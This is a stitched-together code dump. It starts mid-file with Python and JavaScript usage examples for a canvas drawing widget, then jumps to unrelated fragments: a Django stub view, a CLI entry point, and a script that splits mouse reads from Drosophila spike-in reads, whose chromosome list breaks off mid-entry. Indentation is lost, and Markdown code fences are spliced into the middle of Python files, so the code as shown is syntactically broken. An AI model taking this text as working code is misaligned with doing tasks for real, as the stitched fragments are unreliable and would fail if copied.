points = [(50,20), (40, 60), (140, 111), (300,4), (100,70)]
widget.polyline(
points=points, # The vertices of the polyline path
color="green", # Optional color (default: "black")
lineWidth=3, # Optional line width
lineDash=[5,5], # Optional line dash pattern
)
''')
def js_polyline_example():
return js_example(
"""
### Drawing polylines
The `polygon` method with `fill:false` and `close:false` draws a sequence of connected line segments.
""",
'''
var points = [[50,20], [40, 60], [140, 111], [300,4], [100,70]];
element.polygon({
points:points, // The vertices of the polyline path
color:"green", // Optional color (default: "black")
lineWidth:3, // Optional line width
lineDash:[5,5], // Optional line dash pattern
fill:false,
close:false,
});
''')
def py_polygon_example():
return python_example(
"""
### Drawing polygons
The `polygon` method draws a closed sequence of connected line segments.
""",
'''
points = [(50,20), (40, 60), (140, 111), (300,4), (100,70)]
widget.polygon(
points=points, # The vertices of the polyline path
color="green", # Optional color (default: "black")
lineWidth=3, # Optional line width
lineDash=[5,5], # Optional line dash pattern
fill=False, # Optional, if True (default) fill interior
)
''')
def js_polygon_example():
return js_example(
"""
### Drawing polygons
The `polygon` method (with the default of `close:true`) draws a closed sequence of connected line segments.
""",
'''
var points = [[50,20], [40, 60], [140, 111], [300,4], [100,70]];
element.polygon({
points:points, // The vertices of the polyline path
color:"green", // Optional color (default: "black")
lineWidth:3, // Optional line width
lineDash:[5,5], // Optional line dash pattern
fill:false,
// close:true, // default value
});
''')
def js_circle_example():
return js_example(
"""
### Drawing circles with canvas relative radius
The `circle` method draws a circle sized relative to the canvas
coordinate system. Circles on two frames with the same radius
will have the same size.
""",
'''
// map (10,10), (100,100) to (-3,0),(3,6) in the frame
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
)
// Draw a circle positioned relative to the frame and sized relative to the canvas.
frame.circle({
x:4,
y:2.5,
r:20, // radius "r" is in canvas coordinates, not frame coordinates
color:"blue",
fill:false,
lineWidth:5,
lineDash:[5,5],
})
frame.lower_left_axes({max_tick_count:5, color:"green"});
''')
def py_circle_example():
return python_example(
"""
### Drawing circles with canvas relative radius
The `circle` method draws a circle sized relative to the canvas
coordinate system. Circles on two frames with the same radius
will have the same size.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a circle positioned relative to the frame and sized relative to the canvas.
frame.circle(
x=4,
y=2.5,
r=20, # radius "r" is in canvas coordinates, not frame coordinates
color="blue",
fill=False,
lineWidth=5,
lineDash=[5,5],
)
''')
def js_frame_circle_example():
return js_example(
"""
### Drawing circles with frame relative radius
The `frame_circle` method draws a circle sized relative to the current reference frame
coordinate system. Frame circles on two frames with the same radius
may have different sizes if the scaling differs between the frames.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
)
// Draw a circle positioned and sized relative to the frame.
frame.frame_circle({
x:4,
y:2.5,
r:3, // radius "r" is in frame coordinates
color:"blue",
fill:true,
});
frame.lower_left_axes({max_tick_count:5, color:"green"});
''')
def py_frame_circle_example():
return python_example(
"""
### Drawing circles with frame relative radius
The `frame_circle` method draws a circle sized relative to the current reference frame
coordinate system. Frame circles on two frames with the same radius
may have different sizes if the scaling differs between the frames.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a circle positioned and sized relative to the frame.
frame.frame_circle(
x=4,
y=2.5,
r=3, # radius "r" is in frame coordinates
color="blue",
fill=True,
)
''')
def py_star_example():
return python_example(
"""
### Drawing stars
The `star` method draws a star on the canvas.
""",
'''
# Draw a star (always positioned and sized relative to the frame)
widget.star(
x=40, y=25, radius=30,
points=5, # optional number of points
point_factor=2.1, # optional scale factor for outer radius
color="magenta",
fill=False,
lineWidth=5,
lineDash=[5,5],
)
''')
def js_star_example():
return js_example(
"""
### Drawing stars
The `star` method draws a star on the canvas.
""",
'''
// Draw a star (always positioned and sized relative to the frame)
element.star({
x:40, y:25, radius:30,
points:5, // optional number of points
point_factor:2.1, // optional scale factor for outer radius
color:"magenta",
fill:false,
lineWidth:5,
lineDash:[5,5],
})
''')
def py_rect_example():
return python_example(
"""
### Drawing rectangles with canvas relative size
The `rect` method draws a rectangle sized relative to the canvas
coordinate system. `rect`s on two frames with the same width and height
will have the same size.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a rectangle positioned and sized relative to the frame.
(x,y) = (4, 2.5)
frame.rect(
x=x, y=y, # rectangle position relative to the frame
w=50, h=40, # width and height relative to the canvas
dx=-10, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
color="green",
degrees=10, # optional rotation in degrees
fill=False,
lineWidth=5,
lineDash=[5,5],
)
# Draw a reference point at (x, y)
frame.circle(x, y, 5, "red")
frame.lower_left_axes(color="pink")
''')
def js_rect_example():
return js_example(
"""
### Drawing rectangles with canvas relative size
The `rect` method draws a rectangle sized relative to the canvas
coordinate system. `rect`s on two frames with the same width and height
will have the same size.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
);
// Draw a rectangle positioned and sized relative to the frame.
var x = 4;
var y = 2.5;
frame.rect({
x:x, y:y, // rectangle position relative to the frame
w:50, h:40, // width and height relative to the canvas
dx:-10, dy:-10, // offset of lower left corner from (x,y) relative to the canvas
color:"green",
degrees:10, // optional rotation in degrees
fill:false,
lineWidth:5,
lineDash:[5,5],
});
// Draw a reference point at (x, y)
frame.circle({x:x, y:y, r:5, color:"red"});
frame.lower_left_axes({color:"pink", max_tick_count:5})
''')
def py_canvas_rect_example():
return python_example(
"""
### Drawing rectangles with frame relative size
The `frame_rect` method draws a rectangle sized relative to the current reference frame
coordinate system. `frame_rect`s on two frames with the same width and height
may have different sizes.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a rectangle positioned and sized relative to the frame.
(x,y) = (4, 2.5)
frame.frame_rect(
x=x, y=y, # rectangle position
w=5, h=4, # width and height relative to frame
dx=-1, dy=-1, # offset of lower left corner from (x,y) relative to frame
color="green",
fill=False,
degrees=10, # optional rotation in degrees
lineWidth=5,
lineDash=[5,5],
)
# Draw a reference point at (x, y)
frame.circle(x, y, 5, "red")
frame.lower_left_axes(color="pink")
''')
def js_canvas_rect_example():
return js_example(
"""
### Drawing rectangles with frame relative size
The `frame_rect` method draws a rectangle sized relative to the current reference frame
coordinate system. `frame_rect`s on two frames with the same width and height
may have different sizes.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
);
// Draw a rectangle positioned and sized relative to the frame.
var x = 4;
var y = 2.5;
frame.frame_rect({
x:x, y:y, // rectangle position
w:5, h:4, // width and height relative to frame
dx:-1, dy:-1, // offset of lower left corner from (x,y) relative to frame
color:"green",
fill:false,
degrees:10, // optional rotation in degrees
lineWidth:5,
lineDash:[5,5],
})
// Draw a reference point at (x, y)
frame.circle({x:x, y:y, r:5, color:"red"});
frame.lower_left_axes({color:"pink", max_tick_count:5})
''')
def py_text_example():
return python_example(
"""
### Drawing text
The `text` method draws a text string on the canvas.
The position of the text is determined by the current reference frame
but the text font parameters are relative to the shared canvas coordinate space.
""",
'''
(x, y) = (50,20)
widget.text(
x=x, y=y,
text="We the people",
color="white", # Optional color (default: "black")
font="italic 52px Courier", # optional
background="#a00", # optional
degrees=-15, # optional rotation in degrees
align="center", # or "left" or "right", optional
valign="center", # or "bottom", optional
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''')
def js_text_example():
return js_example(
"""
### Drawing text
The `text` method draws a text string on the canvas.
The position of the text is determined by the current reference frame
but the text font parameters are relative to the shared canvas coordinate space.
""",
'''
var x = 240;
var y = 30;
element.text({
x:x, y:y,
text:"We the people",
color:"white", // Optional color (default: "black")
font:"italic 52px Courier", // optional
background:"#a00", // optional
degrees:-15, // optional rotation in degrees
align:"center", // or "left" or "right", optional
valign:"center", // or "bottom", optional
})
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"red"});
''')
def js_event_example():
return js_example(
"""
### Attaching event callbacks
The `object.on(etype, callback)` method
attaches a `callback` to be called when the object
receives an event of type `etype`.
""",
'''
// this circle cannot be mutated and does not respond to events because it is not named.
element.circle({x:0, y:0, r:100, color:"#e99"});
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"Click me please", degrees:45, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_no_name_no_event_example():
return js_example(
"""
### Unnamed objects are invisible to events
If an object is not named it will not respond to events
but a named object drawn underneath the unnamed object may
receive the event.
A named object may also disable events by setting `events:false`
-- the resulting object can be changed or deleted but it will not respond to events.
```Javascript
widget.circle({x:0, y:0, r:100, color:"#e99", name:true, events:false});
```
Below the circle obscures the text but clicks in the
center of the circle are received by the text.
""",
'''
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"CLICK THE CENTER OF THE CIRCLE", degrees:25, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// This circle cannot be mutated and does not respond to events because it is not named.
// The txt1 underneath the circle may respond to clicks on the circle.
element.circle({x:0, y:0, r:70, color:"#e99"});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_event_top_only_example():
return js_example(
"""
### Only the top named object responds to events
Only the top named object under an event receives the event even if
it is drawn using a transparent color.
Any object underneath the top object will not receive the event.
""",
'''
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"TRY TO CLICK THE CENTER OF THE CIRCLE", degrees:15, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// This circle CAN be mutated and MAY respond to events because it is named.
// The txt1 underneath the circle will not respond to clicks on the circle.
element.circle({x:0, y:0, r:70, color:"#e99", name:true});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_axes_example():
return js_example(
"""
### Drawing axes
The `left_axis`, `right_axis`, `bottom_axis`, `top_axis`, and `lower_left_axes` methods
draw axes on the canvas.
""",
'''
element.left_axis({
min_value:10,
max_value:80,
axis_origin:{x:40, y:0},
max_tick_count:3,
color:"green",
add_end_points:true
})
element.right_axis({
min_value:10,
max_value:80,
axis_origin:{x:240, y:0},
max_tick_count:7,
color:"red"
})
element.bottom_axis({
min_value:60,
max_value:110,
axis_origin:{x:0, y:0},
max_tick_count:5,
color:"blue"
})
element.top_axis({
min_value:130,
max_value:180,
axis_origin:{x:0, y:0},
max_tick_count:5,
color:"orange"
})
element.lower_left_axes({
min_x:50,
min_y:30,
max_x:210,
max_y:90,
x_anchor:130,
y_anchor:66,
max_tick_count:4,
color:"brown"
});
''', axes=False)
def py_full_image_example():
return python_example(
"""
### Drawing whole images
Before an image can be drawn on a canvas
the image must be loaded. The `name_image_url` method
loads an image from a file or a remote resource.
After the image has been loaded and named, the `named_image` method
draws the loaded image. If no subimage is specified
the whole image is drawn into the rectangular region.
A loaded image may be drawn any number of times.
""",
'''
# load the image from a remote resource
mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png"
widget.name_image_url(
image_name="mandrill",
url=mandrill_url,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw the *whole* image (don't specify the s* parameters)
image_name="mandrill",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-50, # optional offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''', embeddable=False)
def js_full_image_example():
return js_example(
"""
### Drawing whole images
Before an image can be drawn on a canvas
the image must be loaded. The `name_image_url` method
loads an image from a file or a remote resource.
After the image has been loaded and named, the `named_image` method
draws the loaded image. If no subimage is specified
the whole image is drawn into the rectangular region.
A loaded image may be drawn any number of times.
""",
'''
// load the image from a remote resource
var mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png";
element.name_image_url("mandrill", mandrill_url);
// draw the named image (any number of times)
var x = 50;
var y = 20;
element.named_image({ // Draw the *whole* image (don't specify the s* parameters)
image_name:"mandrill",
x:x, y:y, // rectangle position relative to the canvas
w:150, h:140, // width and height relative to the frame
dx:-30, dy:-50, // optional offset of lower left corner from (x,y) relative to the canvas
degrees:10, // optional rotation in degrees
});
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"magenta"});
''', embeddable=False)
def py_part_image_example():
return python_example(
"""
### Drawing parts of images
The `named_image` method
draws part of a loaded image if the subimage parameters
`sx`, `sy`, `sWidth`, and `sHeight` are specified.
""",
'''
# load the image from a remote resource
mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png"
widget.name_image_url(
image_name="mandrill",
url=mandrill_url,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw just the eyes (by specifying the subimage)
image_name="mandrill",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=40, # width and height relative to the frame
dx=-30, dy=-10, # optional offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
sx=30, sy=15, # subimage upper left corner in image coordinates
sWidth=140, sHeight=20, # subimage extent in image coordinates
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''', embeddable=False)
def js_part_image_example():
return js_example(
"""
### Drawing parts of images
The `named_image` method
draws part of a loaded image if the subimage parameters
`sx`, `sy`, `sWidth`, and `sHeight` are specified.
""",
'''
// load the image from a remote resource
var mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png";
element.name_image_url("mandrill", mandrill_url);
// draw the named image (any number of times)
var x = 50;
var y = 20;
element.named_image({ // Draw just the eyes (by specifying the subimage)
image_name:"mandrill",
x:x, y:y, // rectangle position relative to the canvas
w:150, h:140, // width and height relative to the frame
dx:-30, dy:-50, // optional offset of lower left corner from (x,y) relative to the canvas
degrees:10, // optional rotation in degrees
sx:30, sy:15, // subimage upper left corner in image coordinates
sWidth:140, sHeight:20, // subimage extent in image coordinates
});
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"magenta"});
''', embeddable=False)
def py_bw_image_example():
return python_example(
"""
### Drawing black and white images from arrays
The `name_image_array`
can load a black and white image from a
2 dimensional `numpy` array. The numeric values in the
array should be in the range from 0 to 255.
""",
'''
# Make a "black and white" array.
import numpy as np
checkerboard = np.zeros((8,8))
for i in range(8):
for j in range(8):
if (i + j) % 2 == 0:
checkerboard[i,j] = 64 + 3*i*j
# Load the image from the array.
widget.name_image_array(
image_name="checkerboard",
np_array=checkerboard,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw the whole checkerboard image
image_name="checkerboard",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''')
def py_color_image_example():
return python_example(
"""
### Drawing color images from arrays
The `name_image_array`
can load a color image from a
3 dimensional `numpy` array of shape "width by height by 3"
or "width by height by 4". The values at `array[:,:,0:3]` represent
the red, green, and blue color values for the pixel and should be in the range 0 to 255.
If provided the values at `array[:,:,3]` represent the opacity of the
pixel and should be in the range 0 (transparent) to 1.0 (fully opaque).
""",
'''
# Make a "color" numpy array
import numpy as np
checkerboard = np.zeros((8,8,3))
R = G = B = 255
for i in range(8):
for j in range(8):
if (i + j) % 2 == 0:
checkerboard[i,j] = (R, G, B)
R = (G + 123) % 256
else:
checkerboard[i,j] = (G, R, R)
G = (R + 201) % 256
# Load the image from the array
widget.name_image_array(
image_name="checkerboard",
np_array=checkerboard,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw the whole checkerboard image
image_name="checkerboard",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
degrees=-50, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 10, "yellow")
''')
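# The alpha channel described above (a "width by height by 4" array with opacity
# between 0 and 1.0) is not exercised by the color example. The sketch below shows
# one way such an RGBA array might be built; the gradient values are illustrative
# and `name_image_array` is assumed to accept it the same way as the 3-channel case.

```python
import numpy as np

# Solid red 8x8 image whose opacity fades from transparent to opaque, left to right.
rgba = np.zeros((8, 8, 4))
rgba[:, :, 0] = 255                       # red channel, 0 to 255
rgba[:, :, 3] = np.linspace(0.0, 1.0, 8)  # alpha per column, 0 (clear) to 1 (opaque)

# The array could then be registered and drawn like the RGB example:
# widget.name_image_array(image_name="fading_red", np_array=rgba)
```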
def html_hello_world():
    from IPython.display import display, Markdown
    txt = open("minimal.html").read()
    L = ["```HTML", txt, "```"]
    md = "\n".join(L)
    display(Markdown(md))
# --- modules/__init__.py (autonomousvision/data_aggregation, MIT) ---
from .screen_manager import ScreenManager
# --- transactions/views.py (Hesiod-Labs/Luca-Python, MIT) ---
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
    return HttpResponse("Work in Progress")
# --- src/parse_audits/__main__.py (harmony5/parse_audits, MIT) ---
from parser_cli.cli import cli
cli()
# --- SplitSpikein.py (PavriLab/IgH_VDJ_PROcapseq, MIT) ---
#!/usr/bin/env python3
import re, os, sys
from argparse import ArgumentParser, RawDescriptionHelpFormatter
# from collections import Counter
import pysam
#############
## Read Me ##
#############
# Based on the revised/cleaned version of DiscardNonIghReads.py
#
# Created: 07/jan/2020 by: kimon.froussios@imp.ac.at
#
# The major assumption of this script is that alignment was done with bowtie --best --strata -a
# This means that only equally-best alignments are reported as multimappers (by number of mismatches).
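# The equal-best-alignment assumption above implies a simple per-read decision
# rule. The helper below is a hypothetical sketch of that rule for illustration
# only (`classify_read` and its labels are not part of this script).

```python
def classify_read(aligned_chroms, spike_chroms):
    """Classify a read from the chromosomes of its equally-best alignments."""
    hits = set(aligned_chroms)
    spike_hits = {c for c in hits if c in spike_chroms}
    if not spike_hits:
        return "mouse"       # every best alignment is on the main genome
    if spike_hits == hits:
        return "spikein"     # every best alignment is on a spike-in contig
    return "ambiguous"       # best alignments hit both genomes

print(classify_read(["2L", "X"], {"2L", "2R", "X"}))      # spikein
print(classify_read(["chr12"], {"2L", "2R", "X"}))        # mouse
print(classify_read(["chr12", "2L"], {"2L", "2R", "X"}))  # ambiguous
```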
################
## Parameters ##
################
usage = "Split mouse reads from drosophila spike-in reads"
version = "0.1.0"
# Main Parsers
parser = ArgumentParser(description=usage, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-a", "--allSamFile", type=str, required=True, help="BAM file with all the mapped reads")
parser.add_argument("-o", "--outDir", type=str, required=True, dest="outDir", help="Destination directory.")
args = parser.parse_args()
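# The script only receives a destination directory; a minimal sketch of deriving
# per-genome output names from the input BAM follows. The naming scheme here
# (_mouse/_spikein suffixes) is hypothetical -- the real scheme is not shown in
# this excerpt.

```python
import os

def split_output_paths(all_bam, out_dir):
    # Reuse the input file's stem for the two split outputs.
    stem = os.path.splitext(os.path.basename(all_bam))[0]
    return (os.path.join(out_dir, stem + "_mouse.bam"),
            os.path.join(out_dir, stem + "_spikein.bam"))

print(split_output_paths("/data/sample1.bam", "/results"))
```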
##########################
## Pre-defined Settings ##
##########################
# Flybase r6.27 - all chromosomes and scaffolds
spikeChroms = ["2L","2R","3L","3R","4","X","Y","mitochondrion_genome",
"rDNA","2Cen_mapped_Scaffold_10_D1684","2Cen_mapped_Scaffold_43_D1668","2R2_mapped_Scaffold_56_D1828","3Cen_mapped_Scaffold_1_D1896_D1895","3Cen_mapped_Scaffold_27_D1777","3Cen_mapped_Scaffold_31_D1643_D1653_D1791","3Cen_mapped_Scaffold_36_D1605","3Cen_mapped_Scaffold_41_D1641","3Cen_mapped_Scaffold_50_D1686","X3X4_mapped_Scaffold_6_D1712","X3X4_mapped_Scaffold_14_D1732","XY_mapped_Scaffold_42_D1648","Y_mapped_Scaffold_5_D1748_D1610","Y_mapped_Scaffold_9_D1573","Y_mapped_Scaffold_12_D1771","Y_mapped_Scaffold_15_D1727","Y_mapped_Scaffold_18_D1698","Y_mapped_Scaffold_20_D1762_D1719","Y_mapped_Scaffold_21_D1683_D1693","Y_mapped_Scaffold_23_D1638","Y_mapped_Scaffold_26_D1717","Y_mapped_Scaffold_30_D1720","Y_mapped_Scaffold_34_D1584","Y_mapped_Scaffold_53_D1765",
"Unmapped_Scaffold_4_D1555_D1692","Unmapped_Scaffold_8_D1580_D1567","Unmapped_Scaffold_11_D1754","Unmapped_Scaffold_13_D1782","Unmapped_Scaffold_17_D1756_D1775","Unmapped_Scaffold_22_D1753","Unmapped_Scaffold_24_D1707","Unmapped_Scaffold_28_D1723","Unmapped_Scaffold_29_D1705","Unmapped_Scaffold_32_D1773","Unmapped_Scaffold_35_D1599","Unmapped_Scaffold_37_D1608","Unmapped_Scaffold_38_D1625","Unmapped_Scaffold_44_D1670","Unmapped_Scaffold_45_D1673","Unmapped_Scaffold_46_D1675","Unmapped_Scaffold_48_D1678","Unmapped_Scaffold_51_D1697","Unmapped_Scaffold_52_D1739","Unmapped_Scaffold_54_D1776","Unmapped_Scaffold_58_D1862","Unmapped_Scaffold_60_D1601",
"211000022278279","211000022279762","211000022278033","211000022278089","211000022278170","211000022278224","211000022278269","211000022278354","211000022278391","211000022278415","211000022278678","211000022278894","211000022278978","211000022279018","211000022279130","211000022279169","211000022279344","211000022279387","211000022279450","211000022279594","211000022279735","211000022280087","211000022280171","211000022280577","211000022280583","211000022280626","211000022280652","211000022278095","211000022278096","211000022278164","211000022278171","211000022278205","211000022278493","211000022278521","211000022278535","211000022278581","211000022278611","211000022278672","211000022278673","211000022278676","211000022278711","211000022278712","211000022278765","211000022278858","211000022278859","211000022278860","211000022278888","211000022278889","211000022278926","211000022279011","211000022279095","211000022279096","211000022279097","211000022279116","211000022279117","211000022279118","211000022279139","211000022279147","211000022279148","211000022279155","211000022279156","211000022279157","211000022279158","211000022279159","211000022279191","211000022279265","211000022279308","211000022279309","211000022279310","211000022279370","211000022279371","211000022279372","211000022279373","211000022279376","211000022279389","211000022279463","211000022279480","211000022279517","211000022279521","211000022279522","211000022279538","211000022279539","211000022279540","211000022279575","211000022279576","211000022279578","211000022279613","211000022279634","211000022279645","211000022279647","211000022279691","211000022279692","211000022279693","211000022279694","211000022279695","211000022279699","211000022279700","211000022279711","211000022279743","211000022279744","211000022279745","211000022279746","211000022279849","211000022279850","211000022279858","211000022279866","211000022279868","211000022279869","211000022279872","211000022279898","211000022279948",
"211000022279953","211000022279964","211000022280008","211000022280015","211000022280037","211000022280046","211000022280051","211000022280058","211000022280070","211000022280080","211000022280081","211000022280093","211000022280098","211000022280105","211000022280126","211000022280127","211000022280128","211000022280131","211000022280137","211000022280149","211000022280202","211000022280214","211000022280227","211000022280251","211000022280284","211000022280314","211000022280446","211000022280462","211000022280473","211000022280490","211000022280498","211000022280503","211000022280508","211000022280520","211000022280524","211000022280533","211000022280551","211000022280560","211000022280564","211000022280589","211000022280621","211000022280643","211000022280653","211000022280654","211000022280655","211000022280688","211000022280772","211000022280659","211000022279579","211000022280596","211000022279719","211000022279098","211000022280761","211000022280328","211000022278031","211000022278032","211000022278038","211000022278047","211000022278049","211000022278072","211000022278074","211000022278090","211000022278091","211000022278098","211000022278100","211000022278106","211000022278114","211000022278119","211000022278120","211000022278123","211000022278127","211000022278132","211000022278134","211000022278136","211000022278137","211000022278138","211000022278139","211000022278140","211000022278143","211000022278144","211000022278145","211000022278151","211000022278152","211000022278157","211000022278158","211000022278166","211000022278167","211000022278174","211000022278176","211000022278178","211000022278179","211000022278182","211000022278184","211000022278185","211000022278191","211000022278194","211000022278195","211000022278196","211000022278197","211000022278199","211000022278200","211000022278202","211000022278203","211000022278204","211000022278206","211000022278207","211000022278210","211000022278211","211000022278212","211000022278215","211000022278216",
"211000022278217","211000022278219","211000022278220","211000022278221","211000022278223","211000022278240","211000022278244","211000022278247","211000022278248","211000022278253","211000022278254","211000022278256","211000022278257","211000022278258","211000022278260","211000022278262","211000022278263","211000022278265","211000022278267","211000022278271","211000022278272","211000022278273","211000022278274","211000022278276","211000022278280","211000022278281","211000022278282","211000022278283","211000022278284","211000022278285","211000022278286","211000022278287","211000022278290","211000022278291","211000022278294","211000022278295","211000022278296","211000022278301","211000022278302","211000022278304","211000022278305","211000022278306","211000022278311","211000022278312","211000022278313","211000022278327","211000022278328","211000022278333","211000022278334","211000022278335","211000022278345","211000022278348","211000022278349","211000022278351","211000022278356","211000022278357","211000022278362","211000022278366","211000022278369","211000022278370","211000022278371","211000022278372","211000022278376","211000022278377","211000022278378","211000022278384","211000022278385","211000022278386","211000022278387","211000022278388","211000022278390","211000022278392","211000022278395","211000022278396","211000022278398","211000022278399","211000022278401","211000022278403","211000022278404","211000022278406","211000022278407","211000022278409","211000022278410","211000022278412","211000022278413","211000022278416","211000022278419","211000022278420","211000022278421","211000022278423","211000022278424","211000022278426","211000022278427","211000022278429","211000022278430","211000022278432","211000022278435","211000022278438","211000022278439","211000022278440","211000022278441","211000022278445","211000022278446","211000022278451","211000022278452","211000022278456","211000022278497","211000022278503","211000022278506","211000022278507","211000022278511",
"211000022278514","211000022278515","211000022278517","211000022278520","211000022278525","211000022278526","211000022278528","211000022278530","211000022278533","211000022278536","211000022278537","211000022278539","211000022278540","211000022278541","211000022278546","211000022278547","211000022278548","211000022278549","211000022278550","211000022278556","211000022278558","211000022278559","211000022278562","211000022278568","211000022278569","211000022278571","211000022278573","211000022278574","211000022278575","211000022278576","211000022278580","211000022278582","211000022278585","211000022278588","211000022278589","211000022278592","211000022278593","211000022278594","211000022278597","211000022278599","211000022278600","211000022278602","211000022278604","211000022278641","211000022278650","211000022278651","211000022278652","211000022278653","211000022278668","211000022278675","211000022278680","211000022278686","211000022278688","211000022278689","211000022278697","211000022278699","211000022278702","211000022278707","211000022278708","211000022278714","211000022278716","211000022278717","211000022278718","211000022278720","211000022278721","211000022278723","211000022278727","211000022278729","211000022278730","211000022278732","211000022278733","211000022278735","211000022278738","211000022278740","211000022278744","211000022278745","211000022278747","211000022278748","211000022278750","211000022278751","211000022278754","211000022278755","211000022278757","211000022278758","211000022278759","211000022278761","211000022278768","211000022278769","211000022278773","211000022278776","211000022278777","211000022278780","211000022278781","211000022278785","211000022278786","211000022278788","211000022278790","211000022278793","211000022278794","211000022278804","211000022278807","211000022278808","211000022278848","211000022278849","211000022278862","211000022278865","211000022278870","211000022278875","211000022278883","211000022278884","211000022278887",
"211000022278890","211000022278891","211000022278898","211000022278899","211000022278901","211000022278903","211000022278915","211000022278916","211000022278917","211000022278919","211000022278922","211000022278923","211000022278927","211000022278928","211000022278929","211000022278932","211000022278934","211000022278937","211000022278940","211000022278943","211000022278944","211000022278945","211000022278946","211000022278947","211000022278948","211000022278949","211000022278952","211000022278953","211000022278958","211000022278960","211000022278962","211000022278963","211000022278966","211000022278968","211000022278969","211000022278970","211000022278972","211000022278973","211000022278974","211000022278977","211000022278979","211000022278980","211000022278982","211000022278983","211000022278988","211000022278989","211000022278992","211000022278993","211000022278996","211000022279000","211000022279001","211000022279002","211000022279003","211000022279013","211000022279014","211000022279015","211000022279016","211000022279017","211000022279021","211000022279022","211000022279023","211000022279029","211000022279039","211000022279040","211000022279042","211000022279044","211000022279048","211000022279049","211000022279050","211000022279051","211000022279052","211000022279053","211000022279056","211000022279057","211000022279058","211000022279061","211000022279069","211000022279070","211000022279087","211000022279088","211000022279089","211000022279091","211000022279094","211000022279100","211000022279102","211000022279114","211000022279115","211000022279120","211000022279121","211000022279124","211000022279125","211000022279126","211000022279127","211000022279128","211000022279132","211000022279135","211000022279141","211000022279143","211000022279144","211000022279146","211000022279149","211000022279151","211000022279152","211000022279154","211000022279160","211000022279162","211000022279168","211000022279172","211000022279175","211000022279177","211000022279178",
"211000022279179","211000022279180","211000022279182","211000022279183","211000022279185","211000022279189","211000022279192","211000022279193","211000022279195","211000022279197","211000022279198","211000022279199","211000022279200","211000022279203","211000022279207","211000022279208","211000022279212","211000022279214","211000022279215","211000022279217","211000022279218","211000022279221","211000022279228","211000022279229","211000022279230","211000022279232","211000022279233","211000022279237","211000022279239","211000022279240","211000022279242","211000022279243","211000022279246","211000022279247","211000022279252","211000022279257","211000022279258","211000022279259","211000022279262","211000022279267","211000022279274","211000022279276","211000022279282","211000022279284","211000022279285","211000022279288","211000022279289","211000022279311","211000022279317","211000022279318","211000022279324","211000022279325","211000022279329","211000022279336","211000022279337","211000022279343","211000022279345","211000022279351","211000022279353","211000022279354","211000022279355","211000022279356","211000022279358","211000022279359","211000022279360","211000022279361","211000022279362","211000022279365","211000022279366","211000022279369","211000022279374","211000022279375","211000022279378","211000022279380","211000022279384","211000022279393","211000022279394","211000022279396","211000022279400","211000022279405","211000022279406","211000022279407","211000022279409","211000022279411","211000022279412","211000022279413","211000022279414","211000022279415","211000022279416","211000022279417","211000022279418","211000022279420","211000022279421","211000022279422","211000022279423","211000022279424","211000022279425","211000022279430","211000022279431","211000022279432